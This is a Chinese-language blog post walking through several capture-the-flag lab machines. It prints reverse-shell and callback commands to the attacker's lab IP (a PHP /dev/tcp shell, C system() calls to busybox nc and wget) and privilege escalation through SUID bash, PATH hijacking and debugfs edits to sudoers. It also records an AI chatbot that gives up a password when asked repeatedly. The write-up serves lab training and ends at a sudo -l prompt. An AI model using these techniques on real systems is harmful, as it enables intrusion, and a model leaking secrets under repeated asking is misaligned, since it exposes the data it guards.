{"id":176,"date":"2025-11-09T17:15:20","date_gmt":"2025-11-09T09:15:20","guid":{"rendered":"http:\/\/101.201.119.158\/?p=176"},"modified":"2026-01-21T15:08:23","modified_gmt":"2026-01-21T07:08:23","slug":"hackmyvm","status":"publish","type":"post","link":"http:\/\/101.201.119.158\/?p=176","title":{"rendered":"\u7fa4\u53cb\u9776\u673a"},"content":{"rendered":"\n

\u6e17\u900f\u9776\u673a\ud83d\ude0d<\/h1>\n\n\n\n

\u83b7\u53d6\u9776\u673a\u5730\u5740\uff1a
https:\/\/maze-sec.com\/
qq\u7fa4\uff1a660930334<\/p>\n\n\n\n

HackMyVM | Dashboard<\/a><\/p>\n\n\n\n

bala<\/h2>\n\n\n\n

user<\/h3>\n\n\n\n

\u521a\u5f00\u59cb\u6253\u561b\uff0c\u4ec0\u4e48\u90fd\u4e0d\u4f1a(\u4f8b\u5982\u7f51\u7edc)<\/p>\n\n\n\n

https:\/\/blog.csdn.net\/weixin_43623271\/article\/details\/124145696
\u5173\u4e8e\u7f51\u7edc\u914d\u7f6e\u7684<\/pre>\n\n\n\n
\u4e00\u5f00\u59cb\u8fdb\u5165\u9776\u673a\uff0c\u53d1\u73b0\u9700\u8981\u8d26\u53f7\u5bc6\u7801\u767b\u5f55\uff0c\u4ee5\u4e3a\u90fd\u662f\u9ed8\u8ba4\u7684\uff0c\u6210sb\u4e86\uff0c\u4eba\u5bb6\u90fd\u662f\u6e17\u900f\u8fdb\u53bb\u62ff\u8d26\u53f7\u5bc6\u7801\u7684<\/p>\n\n\n\n
\u4e0d\u8bf4\u4e86\uff0c\u914d\u597d\u7f51\u7edc<\/p>\n\n\n\n
https:\/\/blog.csdn.net\/weixin_43623271\/article\/details\/124145696?utm_source=miniapp_weixin<\/pre>\n\n\n\n
\u4e4b\u540e\uff0c\u5148\u68c0\u67e5\u68c0\u67e5kali\u4e0e\u6e17\u900f\u7684\u9776\u673a\u5728\u4e0d\u5728\u540c\u4e00\u7f51\u6bb5<\/p>\n\n\n\n
\u5728kali\u91cc\u9762\u8f93\u5165ifconfig(\u548cwindows\u7684ipconfig\u4e00\u6837)
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.236
\u8fd4\u56de\u7684\u662f\u8fd9\u4e2a\uff0c\u5c31\u77e5\u9053\u4e86\u6e17\u900f\u7684\u9776\u673aip\u5730\u5740\u5e94\u8be5\u662f192.168.3.x
sudo arp-scan -I eth0 192.168.3.0\/24
\u63a2\u6d4b\u5c40\u57df\u7f51\u5b58\u6d3b\u4e3b\u673a
\u53d1\u73b0
192.168.3.220   08:00:27:1b:c7:cb       PCS Systemtechnik GmbH
\u76f2\u731c\u4e00\u4e0b\u5c31\u662f\u6211\u4eec\u8981\u653b\u51fb\u7684\u9776\u673a\uff0c\u77e5\u9053\u6211\u4eec\u8981\u653b\u51fb\u7684\u9776\u673a\u4e86\uff0c\u626b\u63cf\u4e00\u4e0b\u7aef\u53e3
\u5168\u7aef\u53e3\u5f3a\u5236 TCP \u626b\u63cf\uff1a
sudo nmap -Pn -p- -sT 192.168.3.220
\u8fd4\u56de
PORT     STATE SERVICE
22\/tcp   open  ssh
80\/tcp   open  http
6667\/tcp open  irc<\/pre>\n\n\n\n
\u53d1\u73b0\u662f\u5b58\u572880\u7aef\u53e3\u8bbf\u95ee\u4e00\u4e0b\uff1a192.168.3.220:80<\/p>\n\n\n\n
\u53d1\u73b0\u662f\u5173\u4e8eIRC\u901a\u4fe1\u534f\u8bae\u7684\u7f51\u7ad9\uff0c\u968f\u4fbf\u6d4b\u8bd5\u6d4b\u8bd5\uff0c\u518d\u770b\u770b\u6709\u6ca1\u6709\u4fe1\u606f\u6cc4\u9732\u4ec0\u4e48\u7684\uff0c\u53d1\u73b0\u6ca1\u6709<\/p>\n\n\n\n
\u5728\u7f51\u4e0a\u627e\u627e\u5173\u4e8eIRC\u57fa\u672c\u547d\u4ee4_irc user register-CSDN\u535a\u5ba2<\/a><\/p>\n\n\n\n
\u4f7f\u7528nc\u8fdc\u7a0b\u8fde\u63a5\u4e00\u4e0b6667\u7aef\u53e3\uff0c\u662f\u5173\u4e8eirc\u7684\u670d\u52a1\u5668\uff0c\u8fde\u63a5\u4e4b\u540e\u53d1\u9001 NICK \u548c USER \u547d\u4ee4\u6ce8\u518c\u7528\u6237<\/p>\n\n\n\n
\u6ce8\u518c\u540e\uff0circ\u670d\u52a1\u5668\u4f1a\u8fd4\u56de\u4e86fzer, \/msg\u4fe1\u606f<\/p>\n\n\n\n
nc 192.168.3.220 6667
(UNKNOWN) [192.168.3.220] 6667 (ircd) open
:irc.local NOTICE * :*** Looking up your hostname...
:irc.local NOTICE * :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.3.236) instead.
NICK test123
USER test123 0 * :Test User
:irc.local 001 test123 :Welcome to the Localnet IRC Network test123!test123@192.168.3.236
:irc.local 002 test123 :Your host is irc.local, running version InspIRCd-3
:irc.local 003 test123 :This server was created 01:51:10 Nov 09 2025
:irc.local 004 test123 irc.local InspIRCd-3 iosw biklmnopstv :bklov
:irc.local 005 test123 AWAYLEN=200 CASEMAPPING=rfc1459 CHANLIMIT=#:20 CHANMODES=b,k,l,imnpst CHANNELLEN=64 CHANTYPES=# ELIST=CMNTU HOSTLEN=64 KEYLEN=32 KICKLEN=255 LINELEN=512 MAXLIST=b:100 :are supported by this server
:irc.local 005 test123 MAXTARGETS=20 MODES=20 NAMELEN=128 NETWORK=Localnet NICKLEN=30 PREFIX=(ov)@+ SAFELIST STATUSMSG=@+ TOPICLEN=307 USERLEN=10 USERMODES=,,s,iow WHOX :are supported by this server
:irc.local 251 test123 :There are 1 users and 0 invisible on 1 servers
:irc.local 253 test123 1 :unknown connections
:irc.local 254 test123 4 :channels formed
:irc.local 255 test123 :I have 1 clients and 0 servers
:irc.local 265 test123 :Current local users: 1  Max: 1
:irc.local 266 test123 :Current global users: 1  Max: 1
:irc.local 375 test123 :irc.local message of the day
:irc.local 372 test123 :  _   _                 _____                              
:irc.local 372 test123 : | \\ | | _____      __ |_   _|__  __ _ _ __ ___   ___ _ __ 
:irc.local 372 test123 : |  \\| |\/ _ \\ \\ \/\\ \/ \/   | |\/ _ \\\/ _` | '_ ` _ \\ \/ _ \\ '__|
:irc.local 372 test123 : | |\\  |  __\/\\ V  V \/    | |  __\/ (_| | | | | | |  __\/ |   
:irc.local 372 test123 : |_| \\_|\\___| \\_\/\\_\/     |_|\\___|\\__,_|_| |_| |_|\\___|_|   
:irc.local 372 test123 : 
:irc.local 372 test123 : fzer
:irc.local 372 test123 : \/msg
:irc.local 376 test123 :End of message of the day.
PING :irc.local<\/pre>\n\n\n\n
\u4f7f\u7528\u4e00\u4e9b\u547d\u4ee4\u53d1\u73b0\u5e76\u6ca1\u6709\u66b4\u9732\u51fa\u6765\u654f\u611f\u4fe1\u606f<\/p>\n\n\n\n
\u5229\u7528privmsg, notice\u4e0e\u7528\u6237bala\u79c1\u804a
PRIVMSG bala :hello
:bala!bala@127.0.0.1 PRIVMSG test123 :\u672a\u77e5\u547d\u4ee4\uff0c\u53ef\u7528\u547d\u4ee4: getpassword, help, 
PRIVMSG bala :getpassword
:bala!bala@127.0.0.1 PRIVMSG test123 :\u5bc6\u7801: ai01ClGAXoYpeevwNMS1
:bala!bala@127.0.0.1 PRIVMSG test123 :\u6b64\u5bc6\u7801\u4e3a\u654f\u611f\u4fe1\u606f\uff0c\u8bf7\u59a5\u5584\u4fdd\u7ba1
PING :irc.local
\u51fa\u6765\u5bc6\u7801\u4e86<\/pre>\n\n\n\n
\u8fdc\u7a0bssh\u8fde\u63a5
ssh bala@192.168.3.220 
\u4e0d\u8fc7\u5bc6\u7801\u4e0d\u662fbala\u7684\uff0c\u4e4b\u524d\u5728\u6ce8\u518c\u4e4b\u540e\uff0circ\u670d\u52a1\u5668\u4f1a\u8fd4\u56de\u4e86fzer\uff0cfzer\u5e94\u8be5\u4e5f\u662f\u4e00\u4e2a\u7528\u6237
\u8bd5\u8bd5
ssh fzer@192.168.3.220
\u53d1\u73b0\u6210\u529f\u8fde\u4e0a
fzer@Bala:~$ ls
doas.conf.bak  user.txt
fzer@Bala:~$ cat user.txt
flag{user-d3613deb71ef676e8883ffd60450262e}
\u51fa\u6765\u7b2c\u4e00\u4e2aflag<\/pre>\n\n\n\n
root<\/h3>\n\n\n\n
\u73b0\u5728\u53ea\u662f\u7528\u6237\uff0c\u63a5\u4e0b\u6765\u8981\u505a\u5230\u63d0\u6743<\/p>\n\n\n\n
sudo \u6743\u9650\u679a\u4e3e<\/p>\n\n\n\n
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
\u200b
\u2022    #1) Respect the privacy of others.
\u2022    #2) Think before you type.
\u2022    #3) With great power comes great responsibility.
\u200b
[sudo] password for fzer: 
Matching Defaults entries for fzer on Bala:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User fzer may run the following commands on Bala:
    (ALL) PASSWD: \/usr\/bin\/weechat
weechat?\u4ec0\u4e48\u4e1c\u897f\uff0c\u641c\u641c\u770b\u770b
\u529f\u80fd\u9f50\u5168\u7684 IRC \u63d2\u4ef6\uff1a\u591a\u670d\u52a1\u5668\u3001\u4ee3\u7406\u652f\u6301\u3001IPv6\u3001SASL \u8eab\u4efd\u9a8c\u8bc1\u3001\u6635\u79f0\u5217\u8868\u3001DCC \u548c\u8bb8\u591a\u5176\u4ed6\u529f\u80fd\u3002
\u8bd5\u8bd5\u80fd\u4e0d\u80fd\u63d0\u6743
sudo \/usr\/bin\/weechat<\/pre>\n\n\n\n
\u5728\u6700\u540e\u663e\u793a\u51fa\u6765\u53ef\u4ee5\u4f7f\u7528\u7684\u63d2\u4ef6
Plugins loaded: alias, buflist, charset, exec, fifo, fset, irc, logger, perl,
python, relay, ruby, script, spell, trigger, xfer
\u53d1\u73b0\u5b58\u5728exec\uff0cpython\u4ec0\u4e48\u7684
\u770b\u770bexec\u53ef\u4ee5\u5417
\/exec -sh whoami
fzer
\u53d1\u73b0\u53ef\u4ee5\uff0c\u76f4\u63a5
\/exec -sh cp \/bin\/bash \/home\/fzer\/bash1;chmod u+s \/home\/fzer\/bash1
\u5b8c\u6210\u4e4b\u540e\/exit\u9000\u51fa
\u4f7f\u7528\u547d\u4ee4
ls -lah
\u53d1\u73b0\u5b58\u5728
-rwsr-xr-x 1 root root 1.2M Nov  9 02:17 bash1
fzer@Bala:~$ .\/bash1 -p
bash1-5.0# ls
bash1  doas.conf.bak  user.txt
bash1-5.0# id
uid=1000(fzer) gid=1000(fzer) euid=0(root) groups=1000(fzer)
bash1-5.0# whoami
root
\u63d0\u6743\u62ff\u4e0broot\u6743\u9650<\/pre>\n\n\n\n
sysadmin<\/h2>\n\n\n\n
user<\/h3>\n\n\n\n
\u8001\u6837\u5b50\uff0c\u5148\u626b\u63cf\u5b58\u6d3b\u4e3b\u673a
sudo arp-scan -I eth0 192.168.3.0\/24
\u53d1\u73b0 192.168.3.16
\u5168\u7aef\u53e3\u5f3a\u5236 TCP \u626b\u63cf\uff1a
sudo nmap -Pn -p- -sT 192.168.3.16
PORT   STATE SERVICE
22\/tcp open  ssh
80\/tcp open  http
\u8bbf\u95ee192.168.3.16
\u53d1\u73b0\u662f\u4e00\u4e2a\u4e0a\u4f20\u5e76\u4e14\u7f16\u8bd1\u6267\u884c.c\u7684\u6587\u4ef6\u4e0a\u4f20<\/pre>\n\n\n\n
gcc -std=c11 -nostdinc -I\/var\/www\/include -z execstack -fno-stack-protector -no-pie test.c -o a.out
-std=c11\uff1a\u6307\u5b9a\u4f7f\u7528 C11 \u6807\u51c6\u8fdb\u884c\u7f16\u8bd1
-nostdinc\uff1a\u4e0d\u641c\u7d22\u6807\u51c6\u7cfb\u7edf\u5934\u6587\u4ef6\u76ee\u5f55
-I\/var\/www\/include\uff1a\u6dfb\u52a0\/var\/www\/include\u4f5c\u4e3a\u5934\u6587\u4ef6\u641c\u7d22\u76ee\u5f55
-z execstack\uff1a\u5141\u8bb8\u6808\u6267\u884c\uff0c\u5173\u95ed\u6808\u4fdd\u62a4\u673a\u5236
-fno-stack-protector\uff1a\u7981\u7528\u6808\u4fdd\u62a4\u673a\u5236\uff08\u5173\u95ed\u7f13\u51b2\u533a\u6ea2\u51fa\u68c0\u6d4b\uff09
-no-pie\uff1a\u4e0d\u751f\u6210\u4f4d\u7f6e\u65e0\u5173\u7684\u53ef\u6267\u884c\u6587\u4ef6
test.c\uff1a\u6e90\u6587\u4ef6
-o a.out\uff1a\u6307\u5b9a\u8f93\u51fa\u7684\u53ef\u6267\u884c\u6587\u4ef6\u540d\u4e3a a.out<\/pre>\n\n\n\n
\u8bd5\u8bd5\u76f4\u63a5\u58f0\u660esystem\uff0c\u770b\u80fd\u4e0d\u80fd\u8fd0\u884c<\/p>\n\n\n\n
int system(const char *command);
int main() {
    system(\"busybox nc 192.168.3.236 9427\"); 
    return 0;
}<\/pre>\n\n\n\n
nc -lvp 9427
listening on [any] 9427 ...
192.168.3.16: inverse host lookup failed: Host name lookup failure
\u53d1\u73b0\u53ef\u4ee5\u8fdb\u884c\u5f39shell\uff0c\u4e0d\u8fc7\u8fde\u4e0a\u4e00\u4f1a\u5c31\u6ca1\u6709\u4e86\uff0c\u770b\u770b\u8fdb\u884crce\uff0c\u7136\u540e\u5728\u7f51\u4e0a\u53d1\u73b0\u53ef\u4ee5\u5199\u5165\u516c\u94a5<\/pre>\n\n\n\n
\u83b7\u53d6\u7528\u6237\u7684\u540d\u5b57<\/h4>\n\n\n\n
int system(const char *command);
int main() {
    system(\"echo $(whoami) | busybox nc 192.168.3.236 80\");
    return 0;
}<\/pre>\n\n\n\n
python -m http:server 80 \/\/\u542f\u52a8Python HTTP \u670d\u52a1\u547d\u4ee4
\u8fd4\u56de\u5f97\u5230echo
cat ~\/.ssh\/authorized_keys >  authorized_keys \/\/\u5199\u5165kay<\/pre>\n\n\n\n
python -m http.server 80\/\/\u76d1\u542c
Serving HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...
192.168.3.16 - - [09\/Nov\/2025 19:07:01] \"GET \/authorized_keys HTTP\/1.1\" 200 -<\/pre>\n\n\n\n
\/\/\u4e0a\u4f20\u7684c\u6587\u4ef6
int system(const char *command);
int main() {
    system(\"mkdir -p ~\/.ssh && busybox wget 192.168.3.236\/authorized_keys -O ~\/.ssh\/authorized_keys\");
    return 0;
}<\/pre>\n\n\n\n
\u7136\u540essh\u516c\u94a5\u8fde\u63a5
ssh echo@192.168.3.16
Linux Sysadmin 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU\/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in \/usr\/share\/doc\/*\/copyright.

Debian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
echo@Sysadmin:~$\/\/\u83b7\u5f97user\u6743\u9650<\/pre>\n\n\n\n
root<\/h3>\n\n\n\n
\u83b7\u5f97root\u6743\u9650
sudo -l
Matching Defaults entries for echo on Sysadmin:
    !env_reset, mail_badpass, !env_reset, always_set_home

User echo may run the following commands on Sysadmin:
    (root) NOPASSWD: \/usr\/local\/bin\/system-info.sh
\u770b\u770bsystem-info.sh\u6587\u4ef6
cat \/usr\/local\/bin\/system-info.sh
#!\/bin\/bash

#===================================
# Daily System Info Report
#===================================

echo \"Starting daily system information collection at $(date)\"
echo \"------------------------------------------------------\"

echo \"Checking disk usage...\"
df -h

echo \"Checking log directory...\"
ls -lh \/var\/log\/
find \/var\/log\/ -type f -name \"*.gz\" -mtime +30 -exec rm {} \\;

echo \"Checking critical services...\"
systemctl is-active sshd
systemctl is-active cron

echo \"Collecting CPU and memory information...\"
cat \/proc\/cpuinfo
free -m

echo \"------------------------------------------------------\"
echo \"Report complete at $(date)\"<\/pre>\n\n\n\n
!env_reset \u53ef\u80fd\u5b58\u5728\u8def\u5f84\u52ab\u6301<\/p>\n\n\n\n
echo@Sysadmin:~$ echo \"chmod +s \/bin\/bash\" > \/tmp\/df
echo@Sysadmin:~$ chmod +x \/tmp\/df
echo@Sysadmin:~$ export PATH=\"\/tmp:$PATH\"
echo@Sysadmin:~$ sudo \/usr\/local\/bin\/system-info.sh
echo@Sysadmin:~$ ls -al \/bin\/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 \/bin\/bash
echo@Sysadmin:~$ bash -p
bash-5.0# ls
user.txt
bash-5.0# whoami
root\/\/\u62ff\u5230\u6743\u9650<\/pre>\n\n\n\n
evai<\/h2>\n\n\n\n
user<\/h3>\n\n\n\n
sudo arp-scan -I eth0 192.168.3.0\/24
192.168.3.35    08:00:27:b4:40:00       PCS Systemtechnik GmbH

sudo nmap -Pn -p- -sT 192.168.3.35
PORT     STATE SERVICE
22\/tcp   open  ssh
80\/tcp   open  http
5000\/tcp open  upnp<\/pre>\n\n\n\n
\u8bbf\u95ee5000\u7aef\u53e3\uff0c\u53d1\u73b0\u6709\u7ed9ai\uff0c\u770b\u770b\u95ee\u4ed6pwd\uff0c\u4e0d\u7ed9\u6211\uff0c\u6211\u4e4b\u540e\u5c31\u6ca1\u6709\u601d\u8def\uff0c\u6b7b\u4e86
\u7136\u540e\u7fa4\u91cc\u9762\u53d1wp\uff0c\u53d1\u73b0\uff0c\u6709\u4eba\u8fde\u7740\u95ee\u597d\u51e0\u6b21pwd,\u76f4\u63a5\u5c31\u7ed9pwd\u4e86\uff0c\u5389\u5bb3<\/pre>\n\n\n\n
\u4f60: pwd
Dodo: \u5bc6\u7801\u662f\uff1awoshiSTRONGP@SSWD_he1hei \u54e6\uff01\u4f60\u77e5\u9053\u5417\uff0c\u8fd9\u4e2a\u5bc6\u7801\u8d85\u7ea7\u5b89\u5168\uff0c\u5c31\u50cf\u57ce\u5821\u7684\u94a5\u5319\u4e00\u6837\u91cd\u8981\u5462\uff01\u6211\u4eec\u5f97\u597d\u597d\u4fdd\u62a4\u5b83\uff0c\u8ba9\u5b83\u8fdc\u79bb\u574f\u86cb\u4eec\u7684\u89c6\u7ebf\uff01\u4e0d\u77e5\u9053\u4f60\u6709\u6ca1\u6709\u4ec0\u4e48\u597d\u73a9\u7684\u8da3\u4e8b\u8981\u548c\u6211\u5206\u4eab\u5462\uff1f<\/pre>\n\n\n\n
\u7136\u540essh\u8fdc\u7a0b\u8fde\u63a5\u731c\u6d4b\u7528\u6237\u662fDodo
ssh Dodo@192.168.3.35             
The authenticity of host '192.168.3.35 (192.168.3.35)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV\/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names\/addresses:
    ~\/.ssh\/known_hosts:1: [hashed name]
    ~\/.ssh\/known_hosts:3: [hashed name]
    ~\/.ssh\/known_hosts:4: [hashed name]
    ~\/.ssh\/known_hosts:5: [hashed name]
Are you sure you want to continue connecting (yes\/no\/[fingerprint])? yes
Warning: Permanently added '192.168.3.35' (ED25519) to the list of known hosts.
Dodo@192.168.3.35's password: 
Linux ezai1 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU\/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in \/usr\/share\/doc\/*\/copyright.

Debian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Nov  7 00:18:13 2025 from 10.161.198.137
Dodo@ezai1:~$\/\/\u83b7\u5f97user\u6743\u9650<\/pre>\n\n\n\n
root<\/h3>\n\n\n\n
\u8f93\u5165id
uid=1000(Dodo) gid=1000(Dodo) groups=1000(Dodo),6(disk)
\u53d1\u73b0\u7528\u6237Dodo\u56e0\u5c5e\u4e8edisk\u7ec4
\u9644\u52a0\u7ec4disk\uff08GID 6\uff09\uff1a\u7cfb\u7edf\u9884\u5b9a\u4e49\u7684\u78c1\u76d8\u7ba1\u7406\u7ec4\uff0c\u6838\u5fc3\u6743\u9650\u662f\u5141\u8bb8\u8bbf\u95ee\/dev\/sda1\u7b49\u78c1\u76d8\u8bbe\u5907\u6587\u4ef6\u3002
\u5f53\u7528\u6237\u5c5e\u4e8e disk \u7ec4\u65f6\uff0c\u4f1a\u83b7\u5f97\u76f4\u63a5\u8bbf\u95ee\u7cfb\u7edf\u78c1\u76d8\u8bbe\u5907\u6587\u4ef6\u7684\u6743\u9650
\u7528\u6237\u88ab\u52a0\u5165 sudoers \u540e\uff0c\u53ef\u901a\u8fc7 sudo \u547d\u4ee4\u4ee5 root \u6743\u9650\u6267\u884c\u4efb\u610f\u7cfb\u7edf\u547d\u4ee4<\/pre>\n\n\n\n
\u628a Dodo \u52a0\u2f0a sudoers<\/pre>\n\n\n\n
1<\/th>echo \"Dodo ALL=(ALL) NOPASSWD: ALL\" > \/tmp\/give_dodo_sudo<\/code><\/th>\u751f\u6210 sudo \u6743\u9650\u914d\u7f6e\u6587\u4ef6\uff0c\u5141\u8bb8\u7528\u6237 Dodo<\/code> \u65e0\u5bc6\u7801\u6267\u884c\u6240\u6709\u7cfb\u7edf\u547d\u4ee4<\/th><\/tr><\/thead>
2<\/td>\/usr\/sbin\/debugfs -w \/dev\/sda1<\/code><\/td>\u4ee5\u53ef\u5199\u6a21\u5f0f\u8fdb\u5165\u78c1\u76d8 \/dev\/sda1<\/code> \u7684 debugfs<\/code> \u4ea4\u4e92\u754c\u9762\uff08\u56e0\u7528\u6237\u5c5e\u4e8e disk<\/code> \u7ec4\uff0c\u53ef\u76f4\u63a5\u8bbf\u95ee\u78c1\u76d8\u8bbe\u5907\uff09<\/td><\/tr>
3<\/td>write \/tmp\/give_dodo_sudo \/etc\/sudoers.d\/give_dodo_sudo<\/code><\/td>\u5c06\u4e34\u65f6\u914d\u7f6e\u6587\u4ef6\u5199\u5165\u7cfb\u7edf\u5173\u952e\u76ee\u5f55 \/etc\/sudoers.d\/<\/code>\uff0c\u5e76\u83b7\u53d6\u6587\u4ef6\u7684 inode \u7f16\u53f7\uff0826\uff09<\/td><\/tr>
4<\/td>ln <26> \/etc\/sudoers.d\/give_dodo_sudo<\/code><\/td>\u5efa\u7acb\u6587\u4ef6\u540d\u4e0e inode \u7684\u94fe\u63a5\uff0c\u786e\u4fdd\u6587\u4ef6\u5728\u7cfb\u7edf\u4e2d\u53ef\u88ab\u8bc6\u522b<\/td><\/tr>
5<\/td>sif <26> i_mode 0100440<\/code><\/td>\u8bbe\u7f6e\u6587\u4ef6\u6743\u9650\u4e3a 0440<\/code>\uff08\u4ec5 root<\/code> \u53ef\u5199\uff0c\u5176\u4ed6\u7528\u6237\u53ef\u8bfb\uff0c\u7b26\u5408 sudo<\/code> \u914d\u7f6e\u6587\u4ef6\u7684\u6743\u9650\u89c4\u8303\uff09<\/td><\/tr>
6<\/td>sif <26> i_uid 0<\/code>\u3001sif <26> i_gid 0<\/code><\/td>\u8bbe\u7f6e\u6587\u4ef6\u6240\u6709\u8005\u548c\u7ec4\u4e3a root<\/code>\uff08UID\u3001GID \u5747\u4e3a 0\uff09\uff0c\u4fdd\u8bc1\u914d\u7f6e\u6587\u4ef6\u7684\u7cfb\u7edf\u7ea7\u6743\u9650\u5408\u6cd5\u6027<\/td><\/tr>
7<\/td>quit<\/code><\/td>\u9000\u51fa debugfs<\/code> \u4ea4\u4e92\u754c\u9762<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
id
uid=0(root) gid=0(root) groups=0(root)  \u62ff\u5230root\u6743\u9650<\/pre>\n\n\n\n
baby\u7248<\/h2>\n\n\n\n
\u56e0\u4e3a\u662fbaby\u6240\u4ee5\u5c31\u7b80\u5355\u8bb2\u89e3\u4e00\u4e0b\u4e86\uff0c\u91cd\u70b9\u662f\u600e\u4e48sudo\u63d0\u6743\u7684<\/p>\n\n\n\n
babycms<\/h3>\n\n\n\n
\u5e38\u89c4\u626b\u63cf\u53d1\u73b080\u548c22\u7aef\u53e3
dirsearch\u626b\u63cf\u4e00\u4e0b
dirb http:\/\/babycms.dsz\/ -X .txt,.php,.zip
\u53d1\u73b0admin\u76ee\u5f55\u548csetup.txt
pass:dyxBCEjovrUJa84sV03Q<\/pre>\n\n\n\n
\u8fdb\u5165\u4e3b\u9875\u53d1\u73b0\u7528\u6237\u7684\u540d\u5b57\u662froot
\/admin
root:dyxBCEjovrUJa84sV03Q<\/pre>\n\n\n\n
web\u6e17\u900f<\/h4>\n\n\n\n
\u6253\u5f00helloworld\u63d2\u4ef6\uff0c\u7f16\u8f91index.php\u6587\u4ef6<\/p>\n\n\n\n
\u5934\u90e8\u6dfb\u52a0
<?php
phpinfo();
system(\"\/bin\/bash -c 'bash -i >& \/dev\/tcp\/192.168.3.236\/2332 0>&1'\");<\/pre>\n\n\n\n
\u8bbf\u95ee\u4e3b\u9875\u53d1\u73b0\u51fa\u73b0phpinfo()<\/p>\n\n\n\n
kali:
nc -lvvp 2332
listening on [any] 2332 ...
192.168.3.146: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.146] 47314
bash: cannot set terminal process group (458): Inappropriate ioctl for device
bash: no job control in this shell
www-data@BabyCMS:\/var\/www\/html$ \/usr\/bin\/script -qc \/bin\/bash \/dev\/null
\/usr\/bin\/script -qc \/bin\/bash \/dev\/null<\/pre>\n\n\n\n
\/usr\/bin\/script -qc \/bin\/bash \/dev\/null \/\/\u4f7fshell\u7a33\u5b9a\uff0c\u53ef\u4ee5\u8fdb\u884c\u4e8c\u7ea7\u76ee\u5f55\u64cd\u4f5c\u548c\u4ea4\u4e92shell(\u6bd4\u5982\u4e4b\u540e\u7684mysql\u8fde\u63a5)
https:\/\/www.bilibili.com\/video\/BV1qp4y1Z7Pv\/?spm_id_from=333.1387.search.video_card.click
\u5b66\u4e60\u8d44\u6599<\/pre>\n\n\n\n
\u67e5\u770b\/var\/www\/html \u4e0b\u9762\u7684config.inc.php
\u53d1\u73b0mysql\u6570\u636e\u5e93
'user' => 'pagekit_user',
'password' => 'your_secure_password',<\/pre>\n\n\n\n
\u8fdc\u7a0b\u8fde\u63a5
www-data@BabyCMS:\/$ mysql -upagekit_user -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \\g.
Your MariaDB connection id is 54225
Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| pagekit |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use pagekit;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [pagekit]> show tables;
+-----------------------+
| Tables_in_pagekit |
+-----------------------+
| typecho_comments |
| typecho_contents |
| typecho_fields |
| typecho_metas |
| typecho_options |
| typecho_relationships |
| typecho_userlist |
| typecho_users |
+-----------------------+
8 rows in set (0.000 sec)
MariaDB [pagekit]> select * from typecho_userlist;
+----+--------+----------------------+
| id | name | pass |
+----+--------+----------------------+
| 1 | caigou | dRfGtYhUjIkOlPqAeRtY |
| 2 | user1 | aBcDeFgHiJkLmNoPqRsT |
| 3 | user2 | cNNloFLE88YBIP4ZJfcy |
| 4 | user3 | xYzAbCdEfGhIjKlMnOpQ |
| 5 | user4 | pLmOkNjIbHvGcFxDrEsW |
| 6 | user5 | wVxYzAbCdEfGhIjKlMnO |
| 7 | user6 | sTrUvWxYzAbCdEfGhIjK |
| 8 | user7 | qWeRtYuIoPaSdFgHjKlZ |
| 9 | user8 | mNbVcXzAsDfGhJkLpOqR |
| 10 | user9 | kJiHgFdSaPqOwNeMtBuV |
+----+--------+----------------------+
\u53d1\u73b0\u7528\u6237\u662fcaigou
\u7206\u7834\u5bc6\u7801
cNNloFLE88YBIP4ZJfcy<\/pre>\n\n\n\n
root\u63d0\u6743<\/h4>\n\n\n\n
\u62ff\u5230caigou\u540e\u5e76\u6ca1\u6709\u53d1\u73b0\u5e38\u89c4\u63d0\u6743\u8def\u5f84\u53ef\u2f64\uff0c\u7206\u7834\u4e0a\u9762\u7684\u5bc6\u7801\uff0c\u53d1\u73b0\u5bc6\u7801\u8fd8\u662fcNNloFLE88YBIP4ZJfcy\ud83e\udd14
\u62ff\u5230root\u6743\u9650<\/pre>\n\n\n\n
babypass<\/h3>\n\n\n\n
\u5f04\u597d\u9776\u673a\u4e4b\u540e
\u4f7f\u7528fscan\u626b\u63cf\u4e00\u4e0b
curl\u4e00\u4e0b\u4e3b\u9875 \u53d1\u73b0\u63d0\u793a
hello world
<!-- tms -->
<!-- Do not use same password in different account.  --><\/pre>\n\n\n\n
\u4fe1\u606f\u641c\u96c6\u4e00\u4e0b\u53d1\u73b0tms\u662f\u4e00\u4e2a\u65c5\u6e38\u7ba1\u7406\u7cfb\u7edf
dir\u626b\u4e00\u4e0b\u53d1\u73b0README.md\u8fd9\u4e2a\u6587\u4ef6
\u91cc\u9762\u5b58\u5728\uff1a
Username : admin
Password : Test@123
\u8fdb\u5165\u4e3b\u9875\u53d1\u73b0\u6709\u7684\u70b9\u4e0d\u52a8\uff0c\u5c31\u8bd5\u8bd5\u8fdc\u7a0bssh\u8fde\u63a5\u4e00\u4e0b\u53d1\u73b0\u6210\u529f\u8fde\u63a5\u4e0a\u53bb<\/pre>\n\n\n\n
id
uid=1002(admin) gid=1002(admin) groups=1002(admin)
admin@BabyPass:~$ sudo -l
[sudo] password for admin: 
